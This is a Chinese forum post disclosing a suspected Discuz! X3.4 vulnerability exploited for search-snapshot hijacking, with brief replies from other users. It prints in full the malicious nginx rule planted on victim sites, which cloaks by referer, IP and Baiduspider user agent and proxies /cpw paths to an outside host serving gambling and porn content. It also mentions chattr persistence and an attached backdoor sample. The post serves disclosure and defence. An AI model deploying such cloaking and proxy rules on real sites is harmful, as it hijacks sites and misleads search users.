Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示

民审-M · 发表于 2018-10-8 18:03:17

本帖最后由民审-M 于 2018-10-8 19:32 编辑

/cpw开头的任意路径被快照劫持为非法彩票、赌博、黄网等，
利用伪静态定向蜘蛛引流访问/cpw*目录
改了一个配置文件，创建了一个配置文件
robots.txt
chattr 阻止删除植入文件
文件名discuz.conf
除了在discuz.conf里写了规则，还在主机的conf文件里也写了规则
程序生成的tid都是8位以上
内容如下：

location ^~/cpw {
access_log off;
index index.html index.htm index.php;
if ($http_referer ~* "toutiao.baidu.com|m.toutiao.baidu.com"){
return 404;
}
if ($remote_addr ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
return 404;
}
if ($http_x_forwarded_for ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
return 404;
}
set $flag 0;
if ($http_user_agent ~* (Baiduspider)) {
set $flag 1;
}
if ($http_referer ~* (m.baidu.com|wap.baidu.com|3g.baidu.com|m5.baidu.com)){
set $flag 1;
}
if ($flag = 0) {
return 404;
}
proxy_pass http://107.151.93.122:86/ttysq.com/cpw/;
proxy_redirect http://107.151.93.122:86/ttysq.com/cpw/ http://www.ttysq.com;
proxy_connect_timeout 60;
proxy_read_timeout 60;
proxy_send_timeout 60;
proxy_buffer_size 32k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 1024m;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

复制代码

后门源文件内容：

游客，如果您要查看本帖隐藏内容请回复

后门样本：

a.rar (1.03 MB, 下载次数: 7)

徐天霸主 · 发表于 2018-10-9 01:51:49

我来看看了

husay011121 · 发表于 2018-10-9 11:05:57

不错不错

天空的风 · 发表于 2018-10-9 11:16:59

看看

{:40:}

decode · 发表于 2018-10-9 22:38:05

我是来学习的呀。

你不好 · 发表于 2018-10-26 10:28:32

想看源文件

Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示

相关帖子

浏览过的版块

个人中心